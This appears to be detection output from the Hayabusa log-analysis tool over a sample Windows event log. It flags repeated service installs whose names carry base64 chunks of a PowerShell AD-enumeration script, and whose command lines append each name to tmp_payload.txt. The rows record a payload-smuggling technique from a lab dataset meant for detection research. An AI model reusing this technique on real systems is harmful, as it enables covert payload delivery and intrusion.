2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
